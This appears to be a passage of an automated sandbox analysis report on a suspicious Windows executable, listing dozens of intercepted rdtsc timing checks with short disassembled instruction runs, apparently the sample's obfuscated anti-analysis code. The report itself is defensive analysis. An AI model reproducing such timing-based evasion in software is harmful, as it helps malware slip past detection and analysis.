Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F42 second address: 7260F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov edx, 759B06ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F53 second address: 7260F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F6A second address: 7260F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F82 second address: 7260F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F94 second address: 7260F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F9B second address: 7260FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e call 00007F70F070E5CDh 0x00000013 call 00007F70F070E5D0h 0x00000018 pop eax 0x00000019 pop edx 0x0000001a popad 0x0000001b pop edi 0x0000001c jmp 00007F70F070E5CEh 0x00000021 test eax, eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F70F070E5CAh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260FF3 second address: 7260FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260FF9 second address: 7261029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F715EDDCC97h 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov ebx, esi 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a push edx 0x0000001b push esi 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e popad 0x0000001f mov eax, dword ptr [esi] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261029 second address: 7261039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261039 second address: 7261122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007F70F070E5D6h 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 jmp 00007F70F070E5D0h 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [esi+08h] 0x00000023 pushad 0x00000024 call 00007F70F070E5CEh 0x00000029 push eax 0x0000002a pop edi 0x0000002b pop eax 0x0000002c pushfd 0x0000002d jmp 00007F70F070E5D7h 0x00000032 sub ax, 311Eh 0x00000037 jmp 00007F70F070E5D9h 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [edx+08h], eax 0x00000041 pushad 0x00000042 mov esi, 45722683h 0x00000047 mov si, A7DFh 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+0Ch] 0x0000004f pushad 0x00000050 mov si, B3D7h 0x00000054 pushfd 0x00000055 jmp 00007F70F070E5CCh 0x0000005a add si, AE48h 0x0000005f jmp 00007F70F070E5CBh 0x00000064 popfd 0x00000065 popad 0x00000066 mov dword ptr [edx+0Ch], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F70F070E5D5h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261122 second address: 726117E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 xor ah, FFFFFFEEh 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F0BCDB19h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726117E second address: 72611CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F070E5D3h 0x00000015 adc ch, 0000000Eh 0x00000018 jmp 00007F70F070E5D9h 0x0000001d popfd 0x0000001e push eax 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611CD second address: 72611E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611E7 second address: 72611FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611FA second address: 7261221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261221 second address: 7261287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D5h 0x0000000a and cl, FFFFFFB6h 0x0000000d jmp 00007F70F070E5D1h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+18h] 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c mov edi, 18ABB7ECh 0x00000021 popad 0x00000022 mov dword ptr [edx+18h], eax 0x00000025 jmp 00007F70F070E5CBh 0x0000002a mov eax, dword ptr [esi+1Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F70F070E5D5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261287 second address: 726128C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261380 second address: 72613DE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 add eax, 7B53F9D8h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [edx+24h], eax 0x0000001a jmp 00007F70F070E5D6h 0x0000001f mov eax, dword ptr [esi+28h] 0x00000022 jmp 00007F70F070E5D0h 0x00000027 mov dword ptr [edx+28h], eax 0x0000002a pushad 0x0000002b mov di, si 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72613DE second address: 72613EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ecx, dword ptr [esi+2Ch] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72613EC second address: 7261414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov al, DEh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261414 second address: 7261484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F70F0BCDB16h 0x00000012 mov word ptr [edx+30h], ax 0x00000016 pushad 0x00000017 call 00007F70F0BCDB0Eh 0x0000001c pushfd 0x0000001d jmp 00007F70F0BCDB12h 0x00000022 sub si, 94E8h 0x00000027 jmp 00007F70F0BCDB0Bh 0x0000002c popfd 0x0000002d pop esi 0x0000002e mov dx, C52Ch 0x00000032 popad 0x00000033 mov ax, word ptr [esi+32h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261484 second address: 7261488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261488 second address: 72614A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614A4 second address: 72614AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614AA second address: 72614AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614AE second address: 72614B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614B2 second address: 7261507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 pushad 0x00000015 call 00007F70F0BCDB0Ch 0x0000001a jmp 00007F70F0BCDB12h 0x0000001f pop ecx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr [edx+34h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261507 second address: 726150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726150B second address: 726151A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726151A second address: 726155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F70F070E5CBh 0x0000000c xor ecx, 147371AEh 0x00000012 jmp 00007F70F070E5D9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test ecx, 00000700h 0x00000021 pushad 0x00000022 mov esi, 57B6B6D3h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726155F second address: 7261563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261563 second address: 726157F instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F715EDDC773h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726157F second address: 726158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726158F second address: 7261606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F70F070E5D6h 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F70F070E5D0h 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F70F070E5CEh 0x00000028 or cl, 00000048h 0x0000002b jmp 00007F70F070E5CBh 0x00000030 popfd 0x00000031 movzx ecx, di 0x00000034 popad 0x00000035 pop esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F70F070E5CEh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261606 second address: 7261640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F70F0BCDB14h 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F0BCDB17h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0CBD second address: 72B0CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0CC1 second address: 72B0CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F0BCDB14h 0x00000015 sbb ecx, 5283C078h 0x0000001b jmp 00007F70F0BCDB0Bh 0x00000020 popfd 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F005E second address: 71F0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0064 second address: 71F0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0068 second address: 71F006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F006C second address: 71F008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F0BCDB11h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F008A second address: 71F0090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F06CF second address: 71F06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F06D6 second address: 71F0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 sbb eax, 71A62AD8h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F70F070E5D8h 0x00000023 or ch, 00000038h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov ebx, ecx 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 pop ebp 0x00000037 pushad 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0AEF second address: 71F0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0B01 second address: 71F0B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov cx, 3FC5h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F070E5D7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A8D second address: 7240A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A91 second address: 7240A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A97 second address: 7240AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220008 second address: 72200C1 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5D4h 0x00000012 add si, BA18h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d jmp 00007F70F070E5D8h 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F70F070E5CEh 0x0000002d xor cx, 9BA8h 0x00000032 jmp 00007F70F070E5CBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007F70F070E5D2h 0x00000040 and esp, FFFFFFF0h 0x00000043 jmp 00007F70F070E5D0h 0x00000048 sub esp, 44h 0x0000004b pushad 0x0000004c mov ebx, esi 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 jmp 00007F70F070E5D4h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 mov ecx, edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72200C1 second address: 722011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx ecx, dx 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop esi 0x00000012 mov bx, A10Eh 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Fh 0x0000001d jmp 00007F70F0BCDB13h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F70F0BCDB0Bh 0x0000002d pop ecx 0x0000002e push ebx 0x0000002f pop ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722011E second address: 722015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F70F070E5D6h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722015E second address: 7220164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220164 second address: 722016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722016A second address: 722016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722016E second address: 7220183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 03220245h 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220183 second address: 72201CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB0Ah 0x00000009 jmp 00007F70F0BCDB15h 0x0000000e popfd 0x0000000f jmp 00007F70F0BCDB10h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 call 00007F70F0BCDB0Eh 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72201CE second address: 722020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5CAh 0x0000000a sbb si, 1698h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov edi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F70F070E5D5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722020A second address: 722021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722021A second address: 7220237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 2EDD291Fh 0x00000018 mov cx, 383Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220237 second address: 7220241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1D299D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220241 second address: 7220261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lock bts dword ptr [edi], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F070E5D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220261 second address: 72202B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 adc ax, 51A6h 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 popfd 0x00000014 mov ax, 38D7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jc 00007F716086FCA5h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F70F0BCDB19h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202B5 second address: 72202C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202C5 second address: 72202EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F70F0BCDB18h 0x00000011 push eax 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72202EC second address: 722030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ax, 2A81h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725078F second address: 72507A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72507A5 second address: 72507C3 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ch, C7h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72507C3 second address: 725081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F70F0BCDB17h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F70F0BCDB19h 0x0000000f adc ecx, 5D968A66h 0x00000015 jmp 00007F70F0BCDB11h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ax, bx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725081C second address: 7250821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
